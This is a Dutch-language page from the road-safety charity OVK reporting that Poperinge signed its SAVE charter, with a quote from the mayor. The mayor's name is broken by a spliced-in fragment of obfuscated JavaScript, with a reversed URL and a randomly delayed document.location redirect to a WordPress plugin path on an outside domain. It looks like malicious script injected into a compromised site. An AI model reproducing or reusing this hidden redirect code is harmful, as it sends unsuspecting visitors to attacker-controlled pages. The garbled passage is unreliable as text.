Met het SAVE-Charter Steden & Gemeenten wil de vzw Ouders van Verongelukte Kinderen (OVK) de Belgische steden en gemeenten betrekken bij haar strijd tegen de (nog steeds) te grote verkeersonveiligheid in ons land.

Op deze website vindt u meer informatie over het SAVE-charter. Daarnaast is er ook verdere informatie terug te vinden over OVK en haar werking.

Poperinge ondertekent SAVE-charter

In Poperinge werd op maandag 7 september het 55e SAVE-charter ondertekend, het 13e in West-Vlaanderen. Om het engagement van de stad bij de ondertekening van het SAVE-charter te onderstrepen werd het actieplan reeds voor de ondertekening opgesteld in samenwerking met de gemeentelijke mobiliteitsdienst en de lokale politie. In dit actieplan, dat opgebouwd is rond de zeven doelstellingen van het SAVE-charter, komen de drie E’s uit de verkeerskunde uitgebreid aan bod: Education, Engineering en Enforcement, oftewel sensibilisatie, infrastructuur en handhaving.

Burgemeester Christoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tof Dejaegher (CD&V): “Met deze ondertekening geven wij een duidelijk signaal dat we ons als stad willen inzetten voor meer verkeersveiligheid. Zo hebben we de jongste jaren enkele nieuwe fietspaden aangelegd, er komt er nu nog een naar Woesten, momenteel pakken we de schoolomgevingen aan en in het stadscentrum wordt de zone 30 ingevoerd. Het SAVE-charter zorgt hierbij mee voor een beleidsvisie.”


© 2012 O.V.K. vzw - Léon Theodorstraat 85, 1090 Brussel - Tel: 02/427.75.00 - info@ovk.be